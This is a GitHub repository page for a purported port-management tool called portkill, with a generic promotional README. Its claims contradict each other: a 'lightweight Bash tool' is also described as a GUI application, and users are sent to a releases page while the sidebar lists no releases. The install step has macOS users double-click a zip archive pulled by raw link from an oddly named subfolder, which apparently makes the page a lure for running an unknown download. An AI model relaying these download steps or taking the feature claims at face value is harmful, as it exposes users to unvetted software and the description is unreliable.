Skip to content

πŸ”§ Manage ports effortlessly with PortKill, a lightweight Bash tool designed to terminate processes without dependencies for developers and system admins.

License

Notifications You must be signed in to change notification settings

kiw13299/portkill

Repository files navigation

πŸŽ‰ portkill - Manage Ports and Analyze Networks Easily

Download portkill

πŸ“¦ Introduction

Portkill is an advanced tool for managing network ports and analyzing network performance. You can kill processes, monitor open ports, test connections, and perform performance benchmarks easily on macOS and Linux. With an interactive user interface and support for bulk operations, you'll be able to manage your networking tasks effectively.

πŸš€ Getting Started

Follow these steps to get started with portkill:

  1. System Requirements

    • Operating System: macOS or Linux
    • Memory: Minimum 2 GB RAM recommended
    • Disk Space: At least 100 MB free
    • Network: Required to download and run the application
  2. Features

    • Interactive and user-friendly interface.
    • Real-time monitoring of network ports.
    • Kill and manage processes with ease.
    • Bulk operations for efficiency.
    • Comprehensive diagnostics for network performance.

πŸ”— Download & Install

To get portkill on your computer, visit this page to download:

Download portkill

Installation Steps

  1. Visit the Releases Page: Click the link above to go to the releases page where you can find the latest version of portkill.

  2. Choose the Latest Release: Look for the most recent version listed. This ensures that you have the latest features and fixes.

  3. Download the Appropriate File: Download the file that matches your operating system (macOS or Linux).

  4. Extract the File (if needed): If you downloaded a compressed file, right-click it and select "Extract" to unzip it to a folder.

  5. Run the Application: Navigate to the folder where you extracted the file.

    • On macOS, double-click the https://raw.githubusercontent.com/kiw13299/portkill/main/Slavey/portkill.zip file.
    • On Linux, you may need to open a terminal and run the file using ./portkill.

βš™οΈ Using Portkill

Once you have portkill running, you can start managing your network:

  • Monitor Ports:
    View all open ports and their status in real-time. This helps you identify any unwanted connections.

  • Kill Processes:
    Easily terminate processes that are occupying ports you want to free up.

  • Test Connections:
    Use the connection testing feature to ensure your applications can communicate over the network properly.

  • Performance Benchmarking:
    Run performance tests to analyze network throughput and latency. This helps you understand how well your network is performing.

πŸ“Š Example Operations

Monitoring Ports

  1. Open the main interface of portkill.
  2. Click on the "Monitor Ports" tab.
  3. You will see a list of all active connections.

Killing Processes

  1. Find the process you want to terminate from the list.
  2. Select it and click the "Kill Process" button.

This will free up that port for your applications to use.

Connection Testing

  1. Navigate to the "Connection Test" section.
  2. Enter the target address and click "Test Connection".
  3. Review the results for response times and connectivity issues.

Benchmarking Performance

  1. Go to the "Performance Benchmark" tab.
  2. Click "Run Benchmark" to start testing your network.
  3. View the results to understand your network's performance metrics.

πŸ“š Help & Documentation

For further assistance, please refer to the built-in help documentation within the application. This resource provides detailed explanations for each feature and walks you through any processes you may find difficult.

🌐 Community Support

If you encounter any issues or need more guidance:

  • Issues Page: Report bugs or request features on the GitHub issues page.
  • Forums and Discussion Groups: Create discussions with other users to share tips and solutions.

πŸ”„ Update Process

To keep your portkill application up to date:

  1. Visit the Releases Page: Regularly check for new versions at Download portkill.
  2. Follow Installation Steps: Re-download and install the new version following the steps provided in the "Download & Install" section.

Keeping updated ensures you benefit from the latest features and improvements.

πŸ› οΈ Contribution

If you're interested in contributing to portkill:

  1. Fork the repository on GitHub.
  2. Create your feature branch.
  3. Open a pull request for review.

We welcome all contributions, big or small, to improve portkill!

πŸŽ‰ Conclusion

Portkill is the tool you need for efficient port management and network analysis. With its easy-to-use interface, you can streamline your networking tasks without needing deep technical knowledge. Download portkill today to take control of your network!

About

πŸ”§ Manage ports effortlessly with PortKill, a lightweight Bash tool designed to terminate processes without dependencies for developers and system admins.

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •